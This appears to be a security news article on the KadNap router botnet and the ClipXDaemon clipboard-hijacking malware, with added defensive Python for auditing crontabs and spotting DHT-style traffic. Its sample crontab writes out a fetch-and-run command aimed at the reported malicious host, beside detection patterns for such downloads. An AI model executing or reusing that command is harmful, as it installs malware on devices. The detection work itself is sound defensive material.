
KadNap: The Router Botnet Hiding in Plain Sight

  • Javier Conejo del Cerro
  • 12 minutes ago
  • 3 min read

A newly uncovered malware family called KadNap is quietly turning thousands of edge devices into anonymous proxy infrastructure. First observed in August 2025, the malware primarily targets routers—especially devices from ASUS—to build a decentralized botnet that routes malicious traffic for cybercriminals. Instead of relying on a traditional command-and-control server, KadNap uses the Kademlia Distributed Hash Table (DHT) protocol, embedding itself in peer-to-peer traffic to hide its infrastructure and make disruption significantly harder. Researchers have already identified more than 14,000 compromised devices, demonstrating how edge networking equipment continues to be an attractive entry point for botnet operators seeking resilient infrastructure.


Phase 1: Initial Compromise and Persistence


The infection begins when a malicious shell script named aic.sh is downloaded from the command server 212.104.141[.]140. Once executed on the device, the script establishes persistence by creating a cron job scheduled to run at the 55-minute mark of every hour. The script also renames itself .asusrouter to blend in with legitimate system files; together with the cron entry, this keeps it running even if the device is restarted.

This persistence mechanism allows the attackers to repeatedly fetch updates or additional payloads, maintaining long-term control over the compromised router. The design is simple but effective: by embedding persistence in the system’s scheduled tasks, the malware ensures that the botnet node remains active with minimal operator interaction.


Phase 2: Malware Deployment and Botnet Enrollment


After persistence is established, the script downloads a malicious ELF binary named kad, compiled for both ARM and MIPS processors, the most common architectures in consumer networking devices. Executing this binary installs the KadNap malware itself.

At this stage, the infected device joins a peer-to-peer botnet network powered by Kademlia DHT. Instead of communicating directly with a centralized server, nodes locate peers and command endpoints through distributed hash lookups. This decentralized architecture hides the operators’ infrastructure and blends botnet communication into legitimate peer-to-peer traffic.

To support these operations, additional components such as fwr.sh and /tmp/.sose are deployed. These scripts close SSH port 22, preventing administrators from easily accessing the compromised device, and extract lists of command-and-control IP:port combinations used to communicate with other nodes in the network.
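As an added example (not code from the report, the researchers, or the malware itself), the following Python audit checks a router's crontab and a file listing for the persistence and dropper indicators described in Phase 1 and Phase 2. The sample crontab, the /jffs path and the benign entries are constructed; the minute-55 schedule, the names .asusrouter, aic.sh, fwr.sh and /tmp/.sose, and the download host are the ones the report names.

```python
import re
from collections import OrderedDict

# Indicators described in the report (constructed detection logic, not the
# malware's own code): a cron entry firing at minute 55 of every hour, a script
# renamed to .asusrouter, the helper scripts aic.sh and fwr.sh, the dropped
# file /tmp/.sose and the download host 212.104.141[.]140.
DROPPED_NAMES = (".asusrouter", "aic.sh", "fwr.sh", "/tmp/.sose")
DOWNLOAD_HOST = "212.104.141.140"

# BusyBox-style crontab line: five schedule fields followed by the command.
CRON_LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
PIPE_TO_SHELL_RE = re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b")


def audit_cron_line(line):
    """Return the reasons one crontab line matches the reported persistence pattern (empty if none)."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    m = CRON_LINE_RE.match(stripped)
    if not m:
        return []
    minute, hour, command = m.group(1), m.group(2), m.group(6)
    reasons = []
    if minute == "55" and hour == "*":
        reasons.append("runs at minute 55 of every hour")
    for name in DROPPED_NAMES:
        if name in command:
            reasons.append(f"references {name}")
    if DOWNLOAD_HOST in command:
        reasons.append("contacts the reported download host")
    if PIPE_TO_SHELL_RE.search(command):
        reasons.append("pipes a download straight into a shell")
    return reasons


def audit_crontab(text):
    """Map each suspicious crontab line to its list of reasons, in file order."""
    findings = OrderedDict()
    for line in text.splitlines():
        reasons = audit_cron_line(line)
        if reasons:
            findings[line.strip()] = reasons
    return findings


def audit_file_listing(paths):
    """Return the paths whose file name matches one of the reported dropped files."""
    wanted = {".asusrouter", "aic.sh", "fwr.sh", ".sose"}
    return [p for p in paths if p.rsplit("/", 1)[-1] in wanted]


# Constructed sample crontab; the /jffs path and the benign entry are made up.
SAMPLE_CRONTAB = """\
# constructed sample, not taken from a real device
0 3 * * * /sbin/logrotate.sh
55 * * * * /jffs/.asusrouter
30 * * * * wget -q http://212.104.141.140/aic.sh -O - | sh
"""

# Constructed directory listing for the same hypothetical device.
SAMPLE_LISTING = ["/tmp/.sose", "/jffs/.asusrouter", "/tmp/syslog.log", "/tmp/fwr.sh"]

if __name__ == "__main__":
    for entry, reasons in audit_crontab(SAMPLE_CRONTAB).items():
        print(f"SUSPICIOUS cron entry: {entry}")
        for reason in reasons:
            print(f"  - {reason}")
    for path in audit_file_listing(SAMPLE_LISTING):
        print(f"SUSPICIOUS file: {path}")
```

On a real device you would feed `audit_crontab` the output of `crontab -l` (or the contents of the cron spool directory) and `audit_file_listing` a recursive listing of /tmp and the writable firmware partition; the schedule check and the pipe-to-shell check are generic enough to catch variants that change the file names.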


Phase 3: Monetization Through Proxy Infrastructure


Once devices are integrated into the network, the botnet operators monetize the infrastructure by selling access to compromised routers as anonymous residential proxies. The service responsible for this commercialization is Doppelgänger, a proxy platform that advertises access to residential IP addresses across more than 50 countries.

Security researchers believe this service is likely a rebranding of Faceless, another proxy network previously associated with the router botnet malware TheMoon. By routing traffic through legitimate consumer devices, attackers gain a powerful capability: malicious activity appears to originate from ordinary residential connections rather than suspicious hosting infrastructure.

This approach makes the botnet extremely useful for activities such as:

  • anonymizing malicious traffic

  • bypassing geographic restrictions

  • conducting large-scale scanning or exploitation campaigns

  • hiding the origin of cybercrime operations


Phase 4: A Parallel Threat — ClipXDaemon


Alongside KadNap, researchers identified another Linux threat known as ClipXDaemon, which targets cryptocurrency users rather than routers.

Unlike traditional malware families that rely on command-and-control communication, ClipXDaemon operates autonomously. Running entirely in memory, the malware continuously monitors the clipboard in X11 environments at 200-millisecond intervals. When it detects a cryptocurrency wallet address copied by the user, it replaces that address with one controlled by the attacker.

The malware currently targets several major cryptocurrencies, including:

  • Bitcoin (BTC)

  • Ethereum (ETH)

  • Litecoin (LTC)

  • Monero (XMR)

  • Tron (TRX)

  • Dogecoin (DOGE)

  • Ripple (XRP)

  • TON

Interestingly, the malware deliberately avoids running under Wayland sessions, whose security architecture limits clipboard access. By disabling itself in these environments, the malware reduces the risk of detection or execution errors.


Measures to Fend Off the Attack


Organizations and home users running edge networking devices can significantly reduce risk by implementing the following defensive measures:

  • Keep router firmware fully updated and apply security patches promptly

  • Replace end-of-life networking devices that no longer receive updates

  • Change default administrative credentials immediately after installation

  • Restrict or disable remote management interfaces exposed to the internet

  • Monitor outbound traffic for unusual peer-to-peer communication patterns

  • Inspect scheduled tasks or cron jobs for unexpected persistence mechanisms

  • Regularly reboot networking equipment to disrupt potential malware execution

  • Use endpoint monitoring tools capable of detecting abnormal network activity
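The "monitor outbound traffic for unusual peer-to-peer communication patterns" measure can be made concrete. The Python below is an added example, not from the report or the researchers: it scans flow records for a source that talks to many distinct peers on a single UDP port in small packets, the shape that Kademlia DHT lookups take. The flow records, the thresholds and the port (6881) are constructed assumptions; the report does not state which port KadNap uses.

```python
from collections import defaultdict
from statistics import median


def find_p2p_fanout(flows, min_peers=20, max_median_bytes=512):
    """Flag (source, UDP port) pairs whose traffic fans out to many distinct peers in small flows.

    flows: iterable of (src_ip, dst_ip, proto, dst_port, bytes) tuples.
    Returns {(src_ip, dst_port): distinct_peer_count} for every pair that
    crosses both thresholds. The thresholds are assumptions for illustration.
    """
    peers = defaultdict(set)
    sizes = defaultdict(list)
    for src, dst, proto, dport, nbytes in flows:
        if proto != "udp":
            continue
        peers[(src, dport)].add(dst)
        sizes[(src, dport)].append(nbytes)
    alerts = {}
    for key, dsts in peers.items():
        if len(dsts) >= min_peers and median(sizes[key]) <= max_median_bytes:
            alerts[key] = len(dsts)
    return alerts


def build_sample_flows():
    """Constructed flow records; all addresses are from documentation ranges or RFC 1918."""
    flows = [
        # ordinary HTTPS from the router's management client
        ("192.168.1.1", "198.51.100.10", "tcp", 443, 18000),
        ("192.168.1.1", "198.51.100.10", "tcp", 443, 22000),
    ]
    # a LAN host doing DNS: many small UDP flows, but all to one resolver,
    # so it must not trip the heuristic
    flows += [("192.168.1.50", "192.168.1.1", "udp", 53, 80) for _ in range(30)]
    # the router itself talking to 40 distinct peers on one UDP port with
    # DHT-sized packets, the pattern the report describes (port is assumed)
    for i in range(40):
        flows.append(("192.168.1.1", f"203.0.113.{i + 1}", "udp", 6881, 120 + (i % 5)))
    return flows


if __name__ == "__main__":
    for (src, port), count in find_p2p_fanout(build_sample_flows()).items():
        print(f"{src} -> {count} distinct peers on udp/{port}: review for DHT-style traffic")
```

In practice the records would come from NetFlow/IPFIX export or a firewall's connection log, and a router that should only be forwarding LAN traffic is itself an unusual source; a hit here is a reason to pull the device's crontab and file system, not proof of compromise on its own.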


KadNap highlights a growing trend in cybercrime: the systematic exploitation of edge devices and consumer networking infrastructure. Routers, often overlooked and rarely patched, provide attackers with long-lived access points that are difficult for defenders to monitor.


By combining peer-to-peer command infrastructure, stealth persistence mechanisms, and commercial proxy monetization, KadNap demonstrates how botnet operators are evolving beyond traditional centralized architectures. At the same time, the emergence of threats like ClipXDaemon illustrates how Linux-based environments—particularly those used by developers and cryptocurrency users—are becoming increasingly attractive targets.

As organizations continue expanding their digital infrastructure toward distributed and cloud-connected environments, edge security is rapidly becoming one of the most critical yet underprotected layers of the cybersecurity landscape.



The Hacker News